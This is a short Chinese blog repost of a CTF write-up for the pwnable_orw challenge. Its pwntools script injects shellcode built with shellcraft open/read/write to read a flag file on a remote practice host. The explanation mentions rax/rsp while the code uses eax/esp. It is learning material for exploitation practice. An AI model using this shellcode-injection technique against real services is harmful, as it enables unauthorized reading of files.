shellcraft新姿势
生活随笔
收集整理的這篇文章主要介紹了
shellcraft新姿势
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
pwnable_orw
exp 腳本
這道題的難度在于只能調用 open read 和 write ,學到了 shellcraft 新的使用方式
from pwn import *
io = remote(‘node3.buuoj.cn’,25539)
context.binary = ‘orw’
elf = ELF(‘orw’)
shellcode = shellcraft.open(’/flag’)
shellcode += shellcraft.read(‘eax’,‘esp’,100)
shellcode += shellcraft.write(1,‘esp’,100)
shellcode = asm(shellcode)
sleep(0.2)
io.sendline(shellcode)
io.interactive()
這三個函數在pwntools的原型
在調用open函數后文件描述符fd在rax里,rsp為棧指針寄存器,指向buf
總結
以上是生活随笔為你收集整理的shellcraft新姿势的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C语言 文件读写 EOF - C语言零基
- 下一篇: React之类式组件